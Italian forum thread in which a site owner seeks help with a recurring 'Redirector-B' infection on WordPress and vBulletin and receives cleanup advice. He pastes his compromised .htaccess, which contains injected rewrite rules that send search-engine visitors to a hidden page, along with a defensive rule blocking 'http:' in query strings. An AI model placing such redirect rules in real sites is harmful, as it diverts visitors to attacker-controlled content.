Redirector-B su sito

[TeoB]

Salve a tutti, ho un "piccolo" problema su un sito. É da un po' di tempo che alcuni antivirus segnalano la presenza di un Redirector-B, e non so come toglierlo.

Ho guardato un po' in giro, mi sono informato, ma non riesco a capire come fare ad eradicare il problema alla fonte. Ci sono delle cartelle create dal virus, le rimuovo, e poco dopo ricompaiono. Ho controllato il file .htaccess ed in effetti è pieno di schifezze varie, ma non intendendomene non mi arrischio a toccarlo, ve lo copio qua sotto:

codice:

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthName www.sito.com
AuthUserFile /home/sito/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/sito/public_html/_vti_pvt/service.grp


# a0b4df006e02184c60dbf503e71c87ad

RewriteEngine On

RewriteCond %{HTTP_REFERER} 
^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] 

RewriteCond %{HTTP_REFERER}  
[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                                                                                                                                                                            

RewriteCond %{HTTP_REFERER} 
![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                                                                                                                                                                            

RewriteCond %{TIME_SEC} <59

RewriteRule ^.*$ /wp/wp-content/uploads/2008/elijipo/ex3/t.htm [L]

# a995d2cc661fa72452472e9554b5520c

É un problema che è già presente da una vita, stupidamente l'ho sottovalutato, e ora ha sta prendendo proporzioni decisamente piú grandi.

Grazie a chi mi darà una mano a capire da che parte iniziare

edit: mi sono dimenticato di dire che il problema è partito da word press e si sta estendendo al vbulletin presente sullo stesso dominio.

[TeoB]

Piccolo aggiornamento.

Questo virus ha compromesso la maggior parte, se non tutti, dei files JS e CSS inserendo la stringa: a0b4df006e02184c60dbf503e71c87ad (qualche spiegazione qua ).

I files che hanno questo problema sono tantissimi, potrei pulirli a mano ma ci metterei una vita, inoltre non so se questo puó eliminare il problema alla fonte. Esiste qualche tool che me li ripulisce?

Come faccio a trovare ció che genera tutta questa porcheria?

[Habanero]

se i file sono stati modificati dal nulla, ripulirli senza tappare la falla è poco utile...

Per cercare di tamponare il problema:

1) Verifica che il sistema dal quale ti colleghi in FTP sia pulito e cambia la password di accesso al server FTP.
2) compatibilmente con le applicazioni web che stai usando cerca di assegnare diritti 755 alle cartelle.
3) Ripulisci TUTTI i file e tutte le cartelle o, se ti è possibile, valuta la reinstallazione da zero di tutto il sito.
4) Aggiorna all'ultima versione disponibile tutte le applicazioni di terze parti (blog, forum etc...)
5) Se sono presenti pagine dinamiche da te programmate verifica l'assenza di vulnerabilità... in particolar modo la possibilità di inclusioni remote.

[TeoB]

Grazie, i punti 1, 2 e 3 sono stati fatti oggi. In piú ho seguito questo consiglio ma non mi è chiaro se cosí facendo risolvo il problema alla fonte. Cioè...non capisco che in quel modo blocco l'esecuzione dello script di redirect o anche la scrittura dello script nelle pagine js e css http://www.embedded.ch/http.htm

Punto 4 appena possibile lo faccio, punto 5 non ci dovrebbero essere problemi, ma verifico cmq...grazie mille.

[Habanero]

Le indicazioni del link da te fornito impediscono che la querystring contenga la sottostringa "http:" tipica di un tentativo di inclusione remota. Personalmente preferisco la soluzione basata su .htaccess

[TeoB]

Scusa, io ho appunto modificato l'htaccess:

RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /------------http----------- [F,NC]
RewriteRule http: /---------http----------- [F,NC]

Mi sono dimenticato di dirlo, in questo caso cosa blocco?

[Habanero]

Originariamente inviato da Habanero
Le indicazioni del link da te fornito impediscono che la querystring contenga la sottostringa "http:" tipica di un tentativo di inclusione remota.

Se succede viene inviato un errore 403 Forbidden

[TeoB]

Pardon, non avevo inteso. Grazie mille

[TeoB]

Niente da fare.

Questa notte il virus ha rieditato l'htaccess e ha inserito il codice nel bel mezzo della stringa che avevo aggiunto, spezzandola in due, geniale.

Non so piú cos'altro fare, non posso star qua ogni volta a riuppare un centinaio di files

[Habanero]

cerca di contattare il tuo hoster... attraverso l'analisi dei log può forse capire dove sta il problema...